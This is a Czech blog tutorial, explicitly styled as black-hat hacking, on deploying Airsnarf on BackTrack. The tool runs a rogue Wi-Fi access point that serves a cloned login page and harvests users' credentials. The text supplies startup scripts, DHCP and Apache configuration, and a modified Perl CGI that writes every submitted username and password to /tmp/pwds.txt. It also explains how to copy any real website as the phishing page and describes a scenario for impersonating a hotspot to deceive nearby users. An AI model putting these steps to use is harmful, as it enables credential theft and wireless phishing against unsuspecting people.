Hacking DVD BackTrack, Linux, Hashe RSS Feed twitter airdump.cz BackTrack 3 4 5 6 CZ
Security a Tip
Donate a Sponzor

Airsnarf Login, Heslo, Cafe a Hacker

Shmoo Group Jak získat libovolné data. Distribuce pro pentrační testy. Linux CD s desítkami vybraných aplikací a skriptů. Chytré hračky i nekonvenční hacky. Jeden nápad, pár řádků kódu a překonání silně zaheslovaného účtu je na spadnutí. Není důležité zda-li se jedná o vyšperkovanou Eduoram autentifikaci, mail nebo přihlášení na placený wifi hotspot. Black Hat Hacking. Aplikace na které se v textu budeme věnovat byla publikována již v roce 2004. Původně byla napsána pouze pro wifi hardware kompatibilní s ovládačem hostAP.

Po tom co se dostal na světlo světa Windows software Access Point, byla vydána i verze pro operační systém Windows (software AP je komerční aplikace mimo záběr téma).

Black Hats programek Airsnarf.

Tutorial byl napsan na ovladacich madwifi-ng a karte Atheros. Obsahuje postup pro nastaveni aplikace, konfiguraci a na zaver demonstruje uspesne spusteni a beh aplikace.

Kazdy kdo z Airdump objednal české CD Backtrack, Wifislax (nebo oboji) a ma kartu Atheros si muze napsat o predkonfigurovany Airsnarf ktery staci nakopirovat a spustit.

Distribuce: BackTrack 2 Final :: Aplikace: Airsnarf 2.0 :: Ovladac: Madwifi-ng 0.91 :: WiFi Karta: CB9-Ext :: HTTP server: apache 1.3.37 (mod perl) :: Kod: Template libovolnych www stranek :: DHCP: 3.0.5 :: Meta: Demonstarce ziskani prihlasovacich udaju.

Note: Text vznikl na podnet (emailove dotazy) – Proto zacnu odkonce. Konfigurace je 100% v poradku, aplikace presto neziska zadne hesla. Proc?

V Backtrack konfiguraci servru Apache neni odkomentovany mod perl. To neni vse. V distribuci Backtrack a Wifislax je neupraveny Airsnarf 0.2 (tak jak jej lze stahnout z internetu). Pokud mrknete do airsnarf.cgi najdete tam zminku o Sendmail. V Bt ale Sendmail neni (DieNice). I kdyz Airsnarf „funguje“ vysledek nebude. Pouziju konfiguraci z Remote Exploit ktera funguje na 90%. To co pro uspesne spusteni postrada naleznete v nasem textu.

Konfigurace

Cela aplikace je v ceste /pentest/wireless/airsnarf-0.2. Obsahuje 3 slozky bin, cfg, etc a asi 5 konfiguraku. Zacneme upravou veci ktere v Backtrack nejsou nebo funguji odlisne.

rc.httpd

Krok 1: Udelame startovatko pro Apache. Spustime textovy editor (zadanim prikazu kwrite do konsole napriklad :) do ktereho vlozime tento kod:

#!/bin/sh
conffile=/etc/apache/httpd.conf
function start() {
if grep -q „^Include /etc/apache/mod_ssl.conf“ $conffile ; then
/usr/sbin/apachectl startssl
else
/usr/sbin/apachectl start
fi
}
function stop() {
/usr/sbin/apachectl stop
}
function restart() {
/usr/sbin/apachectl restart
}
case „$1“ in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
*)
echo „usage $0 start|stop|restart“ ;;
esac

Soubor ulozime jako rc.httpd do /etc/rc.d/.

rc.dhcpd

Krok 2: Stejnym postupem vytvorime rc.dhcpd. Vyvolame kwrite a vlozime:

#!/bin/sh
dhcpd_start() {
if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
echo „Starting Dhcp…“
/usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
fi
}
dhcpd_stop() {
killall dhcpd
}
dhcpd_restart() {
dhcpd_stop
sleep 2
dhcpd_start
}
case „$1“ in
‚start‘)
dhcpd_start
;;
‚stop‘)
dhcpd_stop
;;
‚restart‘)
dhcpd_restart
;;
*)
dhcpd_start
esac

…a ulozime jako rc.dhcpd do /pentest/wireless/airsnarf-2.0/etc/rc.d/

chmod

Krok 3: Zmenime prava vytvorenym (upravenym) souborum:

chmod 755 /etc/rc.d/rc.httpd
chmod 755 /etc/rc.d/rc.dhcpd

Apache

Krok 4: Pokud neexistuji, vytvorime slozky odkud http server nacita soubory.

mkdir -p –verbose /var/www/
mkdir –verbose /var/www/cgi-bin

dhcp

Krok 5: Aktualizujeme dhcp. Instalovat lze i ve Slacku primo. Pomoci slapt.

slapt-get –update
slapt-get –install dhcp-3.0.5-i486-2

nebo moznost c.2

wget http://airdump.cz/foo/unca/dhcp-3.0.5-i486-2.tgz
tar -zxvf dhcp-3.0.5-i486-2.tgz
touch /var/state/dhcp/dhcpd.leases

Editace airsnarf

Krok 6: Presuneme se do slozky aplikace

cd /pentest/wireless/airsnarf-0.2

a v ni editujeme soubor airsnarf tak, ze:

Radek 36
iwconifg $ROGUE_INTERFACE essid $ROGUE_SSID mode master

nahradime ** syntaxi master modu (madwifi-ng):

ifconfig $ROGUE_INTERFACE down
wlanconfig $ROGUE_INTERFACE destroy
wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
ifconfig $ROGUE_INTERFACE up
iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master

Dale.., najdeme v kodu:

# restart some services
/etc/init.d/dhcpd restart
/etc/init.d/httpd restart
/etc/init.d/sendmail restart

A nahradime za:

/usr/sbin/dhcpd -cf /etc/dhcpd.conf
/usr/local/apache/bin/apachectl restart
#/etc/init.d/sendmail restart

airsnarf.cfg

Krok 7: Ve slozce cfg editujeme v souboru airsnarf.cfg

ROGUE_NET
ROGUE_GW

dle potreb, napriklad:

ROGUE_NET 10.100.10.15
ROGUE_GW 10.100.10.1

dhcpd.src

Krok 8: Ve slozce etc editujeme dhcpd.src

Nahradime celou konfiguraci timto:

ddns-update-style ad-hoc;
subnet 10.100.10.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.100.10.255;
option routers 10.100.10.1;
option domain-name-servers 10.100.10.1;
option domain-name „domain.com“;
range dynamic-bootp 10.100.10.3 10.100.10.50;
default-lease-time 21600;
max-lease-time 43200;
}

airsnarf_dns.pl

Krok 9: Ve slozce bin editujeme airsnarf_dns.pl

V radku 21 nastavit spravnou IP t.z 10.100.10.1

Co není v textech na internetu

Kazde spusteni Airsnarf generuje novy index.html a airsnarf.cgi ktery pak automaticky vlozen do /var/www. Pokud spravne neupravite kod v /pentest/wireless/airsnarf-0.2/etc/cgi.src porad dokola to bude generovat airsnarf.cgi ktery „pocita s tim“, ze mate v systemu Sendmail.

Reseni: V cgi.src staci nahradit:

$mailprog = ‚/usr/sbin/sendmail‘;
$recipient = ‚root@localhost‘;
open (MAIL, „|$mailprog -t“) or dienice(„Can’t access $mailprog!\n“);
print MAIL „To: $recipient\n“;
print MAIL „Subject: Airsnarf’d Username / Password\n\n“;
foreach $key (keys(%FORM)) {
print MAIL „$key = $FORM{$key}\n“;
}
close(MAIL);

..treba timto kodem:

open (MYFILE, ‚>>/tmp/pwds.txt‘);
foreach $key (keys(%FORM)) {
print MYFILE „$key = $FORM{$key}\n“;
print MYFILE „———————-\n“;
}
close (MYFILE);

mod perl

V Backtrack konfiguraci Apache je mod perl zakomentovany t.z nefunkcni. Pokud provozujete www servr nasledujici konfigurace prichazite o vlastni nastaveni Apache proto si soubor zalohujte.

Reseni je odkomentovani AddHandler cgi-script .cgi .pl popripade uprava konfigurace v casti ScriptAlias.

Podvržená stránka

Index.html ve slozce Airsnarf je pouha ukazka. Pokud chcete aby stranka ktera se bude zobrazovat vypadala jinak je potreba napsat si vlastni. Dalsi moznosti je ulozit www stranku (lze libovolnou) pomoci prohlizece a nasledne upravit chybne cesty k obrazkum. Samozrejme form action taky :) Opera pomoci Ulozit jako.. menu zvlada ruzne druhy ulozeni www na lokalni hardisk. Pro tento ucel se hodi volba „ulozit vcetne obrazku“. Pokud pocitate u stranky s obrazky (hodi se i pokud budete testovat ruzne templates) ukladejte obrazky treba do /var/www/img/ Setri to cas pri uprave cest k obrazkum (pokud pouzijete stahnutej index z internetu).

Epilog

Na Airsnarf lze jednoduse demonstrovat odchyceni loginu a hesla podstrcenim stranek, podobne jak tomu je u emailoveho phishingu. Wireless phishing (spoofing) je o to zakernejsi, ze (v podstate) funguje online. Jak muze vypadat mirne promysleny scenar? Nebezpecne.

„Rogue boy“ s kartou v monitor mode a sniffrem s alerty na konkretni IP nebo DNS ceka na uzivatele. Po tom co libovolny clovek v dosahu pouzije sledovane stranky alert zapipa.

Stačí vhodně změnit konfiguraci IP, ESSID, indexu a MAC adresy. Scénař. Spuštění aplikace Airsnarf – silnějsi signál „nahradí“ slabší, uživatel uvidí pouze hlášku „Pro nečinnost jste byl (-a) automaticky odhlášen. Skvělá aplikace která umí cookie stealing WiFi Zoo.

Znate to. Nebo ne? :) Ps: Screenshoty budou pridany.

** karta se prepne do Modu master = bude se chovat jako software AP.

Kam dál?



Přihlásit / Odhlásit odběr novinek

Počet přihlášených k odběru novinek

    2573